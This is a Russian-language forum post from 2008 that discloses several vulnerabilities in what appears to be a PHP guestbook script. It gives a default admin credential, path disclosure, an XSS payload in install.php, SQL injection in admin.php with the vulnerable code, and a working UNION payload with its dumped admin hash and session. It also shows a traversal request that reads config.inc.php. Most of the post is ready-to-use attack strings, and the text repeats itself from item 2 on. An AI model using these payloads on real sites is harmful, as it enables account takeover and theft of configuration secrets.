1ten0.0net1
25.01.2008, 05:01
1) Дефолтный аккаунт администратора:
admin : pass
2) Раскрытие пути в install.php (при нажатии на кнопку) (error_reporting=On)
Warning: mysql_connect(): Access denied for user 'ODBC'@'localhost' (using password: NO)
in Q:\home\localhost\www\agb\install.php on line 258
Cannot connect to database
Также в скрипте misc/forget_pass.php.
3) XSS в скрипте install.php:
POST:
...&host=localhost"><h1>Here_I_am....
4) SQL инъекция в скрипте admin.php (magic_quotes=Off):
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&del_smilie=1'
Уязвимый код:
if (isset($del_smilie)) {
$gb_auth->query("DELETE FROM ".$GB_TBL['smile']." WHERE id='$del_smilie'");
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1'
Уязвимый код:
if (isset($edit_smilie)) {
if (isset($s_code) && isset($s_emotion)) {
if (!get_magic_quotes_gpc()) {
$s_code = addslashes($s_code);
$s_emotion = addslashes($s_emotion);
}
$gb_auth->query("UPDATE ".$GB_TBL['smile']." SET s_code='$s_code', s_emotion='$s_emotion' WHERE id='$edit_smilie'");
Пример использования:
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1'+and+(1=0)
+union+select+1,2,concat(username,':',password,':' ,session),4,5,6+from+book_auth/*
admin:29bad1457ee5e49e:ea3d671d4778a037b0fb42ef738 fc521
Уязвимый код:
$gb_auth->query("SELECT * FROM ".$GB_TBL['smile']." WHERE id='$edit_smilie'");
5) Чтение произвольных (практически ;-)) файлов (бага старая, перекочевала из предыдущих версий):
Пример использования:
admin.php?action=template&tpl_name=../admin/config.inc.php&session=e17acac372b1cd1c197b838f2346d6c0&uid=1
P. S. сессии администратора существуют в течение получаса.
admin : pass
2) Раскрытие пути в install.php (при нажатии на кнопку) (error_reporting=On)
Warning: mysql_connect(): Access denied for user 'ODBC'@'localhost' (using password: NO)
in Q:\home\localhost\www\agb\install.php on line 258
Cannot connect to database
Также в скрипте misc/forget_pass.php.
3) XSS в скрипте install.php:
POST:
...&host=localhost"><h1>Here_I_am....
4) SQL инъекция в скрипте admin.php (magic_quotes=Off):
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&del_smilie=1'
Уязвимый код:
if (isset($del_smilie)) {
$gb_auth->query("DELETE FROM ".$GB_TBL['smile']." WHERE id='$del_smilie'");
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1'
Уязвимый код:
if (isset($edit_smilie)) {
if (isset($s_code) && isset($s_emotion)) {
if (!get_magic_quotes_gpc()) {
$s_code = addslashes($s_code);
$s_emotion = addslashes($s_emotion);
}
$gb_auth->query("UPDATE ".$GB_TBL['smile']." SET s_code='$s_code', s_emotion='$s_emotion' WHERE id='$edit_smilie'");
Пример использования:
admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1'+and+(1=0)
+union+select+1,2,concat(username,':',password,':' ,session),4,5,6+from+book_auth/*
admin:29bad1457ee5e49e:ea3d671d4778a037b0fb42ef738 fc521
Уязвимый код:
$gb_auth->query("SELECT * FROM ".$GB_TBL['smile']." WHERE id='$edit_smilie'");
5) Чтение произвольных (практически ;-)) файлов (бага старая, перекочевала из предыдущих версий):
Пример использования:
admin.php?action=template&tpl_name=../admin/config.inc.php&session=e17acac372b1cd1c197b838f2346d6c0&uid=1
P. S. сессии администратора существуют в течение получаса.